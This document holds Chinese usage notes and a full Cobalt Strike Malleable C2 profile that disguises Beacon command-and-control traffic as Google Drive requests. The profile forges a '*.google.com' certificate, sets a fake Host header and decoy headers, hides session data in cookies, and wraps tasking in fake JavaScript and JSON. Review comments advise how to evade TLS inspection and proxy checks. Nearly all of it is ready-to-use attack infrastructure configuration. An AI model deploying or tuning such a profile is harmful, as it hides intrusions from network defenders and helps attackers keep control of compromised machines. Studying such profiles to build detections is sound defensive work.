Malleable-C2-Profiles
Beacon 的 HTTP indicators 由 Malleable C2 profile 文件控制。Malleable C2 profile 是一个简单的配置文件,用来指定如何对数据做变换(transform)并把它放进 HTTP 事务(transaction)的某个位置;同一份配置也反过来用于从事务中提取并还原数据,因此 teamserver 和 Beacon 必须使用同一个 profile。
使用方法:./teamserver [external IP] [password] [/path/to/my.profile]
profile 文件可以用 Cobalt Strike 软件包自带的 c2lint 工具进行检查:它会校验语法、用随机数据对各 transform 做往返测试,并预览每个事务在线路上的实际样子(包括 prepend/append 拼出来的伪装内容)。建议每个 profile 在首次使用前都检查一遍。
检查方法:./c2lint [/path/to/my.profile]
PS
- 每次修改 profile 文件后,都必须重启 teamserver 并重新创建 listeners,否则新配置不会生效;之前生成的 payload 里仍然带着旧 profile 的设置,需要重新生成。
data.profile
# Make requests look like Google Drive web requests (Host: drive.google.com) — the "OneDrive" label this profile is sometimes copied with does not match its contents
#
# Author: @ChrisTruncer
# HTTPS listener certificate. These fields populate the self-signed
# certificate the team server generates for the listener; they do not make it
# chain to any public CA. A client, proxy or TLS-inspection device that
# validates certificates will see an untrusted *.google.com certificate, which
# is itself a strong indicator. NOTE(review): where the path is subject to TLS
# inspection, prefer a valid certificate for a domain you control over
# impersonating Google — check the Cobalt Strike docs for loading one.
https-certificate {
set CN "*.google.com"; #Common Name
set O "Google Inc"; #Organization Name
set C "US"; #Country
set L "Mountain View"; #Locality
set ST "California"; #State or Province
set validity "365"; #Number of days the cert is valid for
}
# Global Beacon settings (shared by every listener that uses this profile).
# User-Agent sent with every HTTP request: IE11 on Windows 7 (Trident/7.0,
# NT 6.1). A fixed, dated UA is easy to baseline against the target estate.
set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";
# Check-in interval in milliseconds (30 s between polls).
set sleeptime "30000";
# SMB Beacon named pipe, styled after Chrome's mojo.* pipes. NOTE(review):
# the trailing ## is presumably the placeholder Cobalt Strike substitutes at
# runtime (as in the default msagent_## name) — confirm with c2lint.
set pipename "mojo.5688.8052.183894939787088877##";
# Random jitter applied to sleeptime, as a percentage (15%).
set jitter "15";
# DNS Beacon: address answered when no tasking is available; a public Google
# resolver blends in with ordinary lookups.
set dns_idle "8.8.4.4";
# DNS Beacon: delay in milliseconds before each individual DNS request.
set dns_sleep "0";
# DNS Beacon: maximum hostname length (<= 255) when uploading data over DNS.
set maxdns "235";
# GET transaction: Beacon polls this for tasking. Session metadata rides in
# the Cookie header; the reply is dressed up as a Google Drive static script.
http-get {
# Fixed path used for every poll (see the Cache-Control note below).
set uri "/scs/drive-static/js/3.14/";
client {
# Transforms apply in listing order: base64-encode the metadata, prefix
# "OSID=", then carry the result in the Cookie header. NOTE(review): plain
# base64 yields '+', '/' and '=' padding; most cookie parsers tolerate them,
# but base64url is the safer choice if a proxy on the path normalises cookies.
metadata {
base64;
prepend "OSID=";
header "Cookie";
}
# Decoy request headers. The Host value is cosmetic: the request still goes
# to the listener/redirector, and Google no longer permits domain fronting,
# so a drive.google.com Host on a non-Google destination (together with the
# self-signed certificate above) is a mismatch inspection devices can key on.
header "Host" "drive.google.com";
header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
header "Accept-Language" "en-US;q=0.3,en;q=0.2";
header "Accept-Encoding" "gzip, deflate";
header "DNT" "1";
}
server {
# Decoy response headers mimicking a Google static-content reply.
header "X-Content-Type-Options" "nosniff";
header "X-Frame-Options" "SAMEORIGIN";
# NOTE(review): this marks the tasking response cacheable for a year, on a
# URI that never changes and with no Vary: Cookie, so an intermediate cache
# could hand a stale reply to later polls. The http-post block below uses
# "no-cache, no-store" — consider the same here unless the decoy value is
# essential, and verify behaviour against the proxy path actually in use.
header "Cache-Control" "public, max-age=31536000";
header "X-XSS-Protection" "1; mode=block";
header "Server" "GSE";
header "Alternate-Protocol" "443:quic,p=1";
# Task data is wrapped in JavaScript-looking decoy text. No encoding
# transform (base64/mask) is applied here, so the encrypted task bytes are
# emitted raw between these strings. NOTE(review): prepend transforms stack —
# each one goes in front of everything added before it — so the emitted text
# reads these lines bottom-to-top (the final "try(" ends up first). Reverse
# the order if the top-to-bottom try/catch shape is intended; c2lint's
# preview shows the actual bytes. JavaScript also uses braces, not
# parentheses, after try/catch, so this will not pass as real script.
output{
prepend "try(";
prepend "O(L.Oa(),\"sy580\")";
prepend "N(L.Oa(),\"sy580\");P(L.Oa(),\"sy580\");";
prepend ")catch(e)(_DumpException(e))";
prepend "try(";
prepend "O(L.Oa(),\"sy558\");";
prepend "N(L.Oa(),\"sy558\");P(L.Oa(),\"sy558\");";
prepend ")catch(e)(_DumpException(e))";
prepend "try(";
append "var f2=function(a)(a=a.wa;return\"application/chromium-bookmark-folder\"==a||\"application/chromium-root-folder\"==a||\"application/vnd.google-apps.folder\"==a||\"application/vnd.google-apps.photoalbum\"==a||\"application/vnd.google-apps.rollupphotoalbum\"==a)";
append ",g2=function(a)(return a.ra),s8d=function(a)(return a?hb(a,function(a)(return new UP(a)):[]),h2=function(a)(switch(a)(case \"all\":case \"docs-images\":case \"docs-images-and-videos\":case \"docs-videos\":case \"documents\":case \"drawings\":case \"folders\":case \"forms\":case \"pdfs\":case \"presentations\":case \"sites\":case \"spreadsheets\":case \"tables\":return!0)return!1); O(L.Oa(),\"ak477\")";
# Terminal transform: emit the assembled bytes as the response body.
print;
}
}
}
# POST transaction: Beacon submits task output here. The session id rides in
# the Cookie header and the output goes in the request body.
http-post {
# Fixed path; the static query parameters below are appended to it.
set uri "/drive/ui/1/";
client {
# Decoy query-string parameters sent unchanged with every POST.
parameter "ui" "s3212f5452";
parameter "hop" "3620521";
parameter "start" "0";
# NOTE(review): the body built below is bare base64, not key=value pairs,
# so it does not match this Content-Type; a strict proxy or WAF may flag
# the mismatch.
header "Content-Type" "application/x-www-form-urlencoded;charset=utf-8";
# Session id: base64, prefixed "OSID=", carried in Cookie (same shape as the
# metadata cookie in http-get).
id {
base64;
prepend "OSID=";
header "Cookie";
}
# Task output: base64-encoded and sent as the raw request body.
output{
base64;
print;
}
}
server {
# Decoy response headers; unlike http-get, this reply is marked uncacheable.
header "X-Content-Type-Options" "nosniff";
header "X-Frame-Options" "SAMEORIGIN";
header "Cache-Control" "no-cache, no-store, max-age=0, must-revalidate";
header "X-XSS-Protection" "1; mode=block";
header "Server" "GSE";
# Response body dressed as a Google-style JSON array. Transforms apply in
# order: the prepend goes in front of the data, the appends follow it, giving
# [[["apm","<data>"],["ci",[]],["cm",[],[]]],'dkkasdh56sa0d45e1f'].
# No encoding transform is applied, so any response bytes are emitted raw.
output {
prepend "[[[\"apm\",\"";
append "\"]";
append ",[\"ci\",[]";
append "]";
append ",[\"cm\",[]";
append ",[]";
append "]";
append "],'dkkasdh56sa0d45e1f']";
# Terminal transform: emit the assembled bytes as the response body.
print;
}
}
}